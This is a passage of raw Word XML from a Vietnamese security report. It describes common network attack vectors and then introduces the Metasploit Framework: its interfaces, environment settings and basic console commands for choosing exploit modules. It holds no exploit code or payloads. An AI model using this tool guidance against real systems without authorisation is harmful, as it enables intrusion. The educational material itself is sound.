          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.5.1.3.1. Phần mềm chưa được vá</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="0A7294E8" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBd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ác lỗ hổng chưa được vá cho phép tin tặc chạy mã độc và xâm nhập vào hệ thống. Tin tặc sẽ thăm dò hệ thống mạng của doanh nghiệp để tìm ra các lỗ hổng bảo mật. Sau đó, chúng mới lên kế hoạch tấn công lỗ hổng trực tiếp hoặc gián tiếp. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C73802" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc90050759"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.5.1.3.2. Thông tin đăng nhập yếu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="3DBC999D" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBd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in tặc có thể tấn công brute force để cố gắng đoán ra mật khẩu của người dùng. Khi nắm trong tay mật khẩu, chúng có thể truy cập vào các hệ thống mạng của doanh nghiệp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075E03AA" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc90050760"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.5.1.3.3. Phishing, Web &amp; Ransomware</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="3CBF4C40" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBd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Phishing là hình thức tấn công bằng cách lừa người dùng thực thi mã độc. Nhờ đó, tin tặc có thể xâm nhập vào tài khoản và hệ thống mạng của doanh nghiệp. Thông thường, tin tặc sẽ gửi cho người dùng một email giả mạo, trong đó chứa nội dung kích thích người dùng click vào liên kết hoặc tải xuống tệp tin có mã độc. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DD15A2" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc90050761"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.5.1.3.4. Trust Relationship</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6993AE48" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBd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rong một trust relationship cần có 2 domain. Domain được tin tưởng được gọi là trusted domain. Domain tin tưởng domain kia gọi là trusting domain. Cơ chế trust relationship đảm bảo các đối tượng được tạo ra trên trusted domain có thể đăng nhập hay truy cập tài nguyên trên trusting domain. Khi giành được quyền truy cập vào trusted domain, tin tặc có thể xâm nhập vào trusting domain và phá hủy hệ thống.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6191F677" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc90050762"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.5.1.3.5. Thông tin đăng nhập bị xâm phạm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A92C2A" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBd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in tặc có thể sử dụng thông tin đăng nhập bị xâm phạm để truy cập trái phép vào hệ thống mạng. Tin tặc sẽ cố gắng trích xuất mật khẩu từ thông tin liên lạc không được mã hóa hoặc mã hóa không chính xác giữa các hệ thống của doanh nghiệp, hoặc từ việc xử lý dữ liệu không an toàn bởi phần mềm hoặc người dùng. Tin tặc cũng có thể tấn công bằng cách sử dụng lại mật khẩu trên các hệ thống khác nhau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7010278A" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc90050763"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.5.1.3.6. Nội gián độc hại</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w14:paraId="36C9C2A2" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBd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ác nhân viên hoặc nhà cung cấp có thể lợi dụng quyền truy cập của mình để lấy cắp dữ liệu hoặc phá hủy hệ thống mạng của doanh nghiệp. Doanh nghiệp cần cân nhắc kỹ lưỡng trước khi phân quyền truy cập vào hệ thống quan trọng cho bất cứ ai. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753C9119" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc90050764"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.5.1.3.7. Mã hóa kém</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F975A87" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBd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Với các hệ thống không được mã hóa tốt, tin tặc có thể chặn kết nối giữa chúng và đánh cắp thông tin. Sau đó, chúng trích xuất thông tin quan trọng, mạo danh một trong hai bên và chèn dữ liệu sai lệch trong quá trình trao đổi dữ liệu. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C78BCFD" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc90050765"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.5.1.3.8. Zero-day</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w14:paraId="1EF72ED9" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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Zero day là lỗ hổng bảo mật chưa được nhà phát triển phần mềm biết đến và cũng chưa được khắc phục. Chính vì vậy, nếu bị tấn công qua lỗ hổng zero-day, hậu quả sẽ vô cùng nặng nề. Tin tặc sẽ liên tục thăm dò hệ thống mạng của mục tiêu để tìm ra các lỗ hổng zero-day mà chúng có thể khai thác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCCF4C1" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA" w:rsidP="002103A9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc90050766"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.5.2. Khai thác lỗ hổng với Metasploit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w14:paraId="50D65340" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00B53014" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc90050767"/>
      <w:r w:rsidRPr="00B53014">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.5.2.1. Giới thiệu Metasploit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w14:paraId="49448E7F" w14:textId="6F448980"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Metasploit Framework là một môi trường dùng để kiểm tra, tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những component được viết bằng C, assembler, và Python. Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS.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ó thể download chương trình tại </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>metasploit.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661B8C94"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etasploit có thể tự động update bắt đầu từ version 2.2 trở đi, sử dụng script </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>msfupdate.bat</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> trong thư mục cài đặt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49ECFFED" w14:textId="7777777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72" w:name="_Toc90050768"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.5.2.2. Các thành phần của Metasploit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p w14:paraId="24231219"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etasploit hỗ trợ nhiều giao diện với người dùng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707A0B3E" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>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Console interface:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> Dùng msfconsole.bat. Msfconsole interface sử dụng các dòng lệnh để cấu hình, kiểm tra nên nhanh hơn và mềm dẻo hơn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150E3247" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>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Web interface:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> Dùng msfweb.bat, giao tiếp với người dùng thông qua giao diện web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAB7EDF" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>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Command line interface:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> Dùng msfcli.bat</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="402D484F" wp14:editId="243BD29F">
                <wp:extent cx="314325" cy="314325"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="298" name="Rectangle 298" descr="VDO.AI"/>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5EFAF227" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRDefault="006F1FD5">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02D484F" id="Rectangle 298" o:spid="_x0000_s1099" alt="VDO.AI"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" filled="f" stroked="f">
                <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                  <w:txbxContent>
                    <w:p w14:paraId="5EFAF227" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRDefault="006F1FD5">
                      <w:pPr>
                        <w:spacing w:line="240" w:lineRule="auto"/>
                        <w:textDirection w:val="btLr"/>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2F09E1"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Environment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399AC08D" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Global Environment:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> Được thực thi thông qua 2 câu lệnh setg và unsetg, những options được gán ở đây sẽ mang tính toàn cục, được đưa vào tất cả các module exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D9A377" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Temporary Environment:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> Được thực thi thông qua 2 câu lệnh set và unset, environment này chỉ được đưa vào module exploit đang load hiện tại, không ảnh hưởng đến các module exploit khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3860AF39" w14:textId="67AFC895" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="00C97D8D">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Pr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ta</w:t>
      </w:r>
      <w:r w:rsidR="001F7EFA" w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> có thể lưu lại environment mình đã cấu hình thông qua lệnh save. Môi trường đó sẽ được lưu trong /.msf/config và sẽ được load trở lại khi user interface được thực hiện.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702EF0E0" w14:textId="1CB43ED2"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Những options nào mà chung giữa các exploits module như là: LPORT, LHOST, PAYLOAD thì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nên được xác định ở Global Environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DBBE81" w14:textId="7777777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73" w:name="_Toc90050769"/>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.5.2.3. Cách sử dụng Metasploit framework</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w14:paraId="302841E4"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2.5.2.3.1. Chọn module exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1374984E"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Lựa chọn chương trình, dịch vụ lỗi mà Metasploit có hỗ trợ để khai thác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B039EF5" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>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how exploits:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> Xem các module exploit mà framework có hỗ trợ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F606CD" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>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use exploit_name:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t> Chọn module exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6FD297" w14:textId="77777777" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="001F7EFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>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info exploit_name</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97D8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: Xem thông tin về module exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EEEF2E" w14:textId="68F33A91" w:rsidR="006F1FD5" w:rsidRPr="00C97D8D" w:rsidRDefault="00C97D8D">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Pr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
